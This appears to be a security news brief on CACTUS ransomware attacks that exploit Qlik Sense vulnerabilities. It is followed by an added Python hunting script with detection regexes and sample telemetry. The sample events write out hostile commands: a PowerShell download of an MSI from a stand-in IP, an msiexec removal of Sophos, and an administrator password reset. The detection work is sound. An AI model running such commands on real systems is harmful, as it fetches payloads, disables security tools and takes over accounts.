Ransomware, Vulnerability Management, Threat Intelligence

Qlik Sense flaws leveraged in new CACTUS ransomware attacks

Vulnerabilities in the Qlik Sense cloud analytics and business intelligence platform have been exploited to deploy CACTUS ransomware in a new campaign, The Hacker News reports. According to a report from Arctic Wolf, the attackers first exploit the critical HTTP request tunneling flaw CVE-2023-41265, the critical unauthenticated remote code execution flaw CVE-2023-48365 (a bypass of the original fix for CVE-2023-41265, so installations patched only against the earlier flaws remain exposed) and the medium-severity path traversal flaw CVE-2023-41266, then abuse the Qlik Sense Scheduler service to download additional remote monitoring and management tools. The attackers have also uninstalled Sophos security software, changed the passwords of administrator accounts and set up an RDP tunnel before distributing the CACTUS ransomware. The findings come amid a ransomware landscape that is growing in both volume and sophistication: Dragos counted 318 ransomware attacks across all industries in October alone, compared with 253 in the second quarter and 231 in the third quarter of this year.
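The post-exploitation chain above (the Scheduler service fetching tooling, Sophos being removed, administrator passwords being reset) is what a defender would hunt for in process-creation telemetry. The script below is an added example written for this page, not code from SC Media, Arctic Wolf or Qlik. It assumes Sysmon-style process-creation events with ParentImage, Image and CommandLine fields, assumes the Qlik Sense Scheduler service binary is Scheduler.exe under a ...\Qlik\Sense\ path, and runs over a handful of constructed sample events; the rule patterns are starting points to tune, not verified indicators from the report.

```python
"""Hunt for the CACTUS post-exploitation chain in process-creation events.

Added example (not from the original article or the Arctic Wolf report).
Assumptions, all labelled: events look like Sysmon Event ID 1 records,
the Qlik Sense Scheduler binary is Scheduler.exe under ...\\Qlik\\Sense\\,
and the sample events below are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Child processes a scheduler service should never spawn (assumption: tunable list).
DOWNLOADERS = {"powershell.exe", "cmd.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}

# Assumption: Qlik Sense Scheduler service binary path.
QLIK_SCHEDULER = re.compile(r"\\qlik\\sense\\.*\\scheduler\.exe$", re.I)
# Sophos removal: product name plus an uninstall verb or msiexec /x, in either order.
SOPHOS_REMOVAL = re.compile(r"sophos.*(?:uninstall|/x\b|/remove)|(?:uninstall|/x\b).*sophos", re.I)
# "net user <account> <newpassword>": the password token must not be a switch such as /active:yes.
ADMIN_PW_CHANGE = re.compile(r"\bnet(?:1)?(?:\.exe)?\s+user\s+(\S+)\s+(?!/)\S+", re.I)


@dataclass
class Finding:
    rule: str
    event_index: int
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Return one Finding per matched rule, in event order."""
    findings = []
    for i, ev in enumerate(events):
        parent = ev.get("ParentImage", "")
        child = basename(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        if QLIK_SCHEDULER.search(parent) and child in DOWNLOADERS:
            findings.append(Finding("qlik_scheduler_spawns_downloader", i, f"{child}: {cmd}"))
        if SOPHOS_REMOVAL.search(cmd):
            findings.append(Finding("sophos_removal", i, cmd))
        m = ADMIN_PW_CHANGE.search(cmd)
        if m:
            # Flag every password reset; the account name lets an analyst prioritise admin accounts.
            findings.append(Finding("account_password_change", i, f"account={m.group(1)}: {cmd}"))
    return findings


# Constructed sample telemetry (not real logs). 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "CommandLine": r'"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe"'},          # benign service start
    {"ParentImage": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -c Invoke-WebRequest http://203.0.113.10/agent.msi -OutFile C:\\Windows\\Temp\\a.msi"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process"},                                      # benign interactive use
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": 'msiexec.exe /x "Sophos Endpoint Agent" /qn'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user Administrator N3wP@ssw0rd!"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user Administrator /active:yes"},                               # not a password change
]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.event_index}: {f.detail}")
```

The first rule is the one worth keeping even if the others are noisy: a scheduler service has no legitimate reason to spawn PowerShell, curl or certutil, so the parent/child pairing stays a strong signal regardless of which download tool the attacker picks.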
